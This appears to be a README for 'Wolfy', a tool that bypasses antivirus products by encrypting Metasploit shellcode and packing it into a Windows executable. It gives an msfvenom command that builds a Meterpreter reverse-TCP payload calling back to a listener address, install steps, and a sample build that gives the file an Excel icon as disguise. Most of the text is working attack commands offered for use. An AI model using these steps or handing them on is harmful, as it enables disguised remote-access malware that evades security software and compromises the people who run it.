Wolfy is a tool which bypass AVs by using a crypter + the tool Condor from mrempy/Condor
- Custom shellcodes with metasploit
- AES Encryption
- Can be used in Linux and Windows
- Can be used with covenant
python3 wolfy.py -h
usage: wolfy.py [-h] -s SHELLCODE [-i ICON] -n EXENAME
optional arguments:
-h, --help show this help message and exit
-s SHELLCODE, --shellcode SHELLCODE
.bin shellcode file
-i ICON, --icon ICON icon of exe
-n EXENAME, --name EXENAME
.exe name
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.6 LPORT=443 -f raw -o shellcode.bin
Note: You can generate whatever metasploit payload you want.
If you are in linux, execute sudo bash install.sh
If you are in Windows, execute pip install pycryptodome pyinstaller tinyaes colorama Cython
python3 wolfy.py -s shellcode.bin -i excel -n myexename
See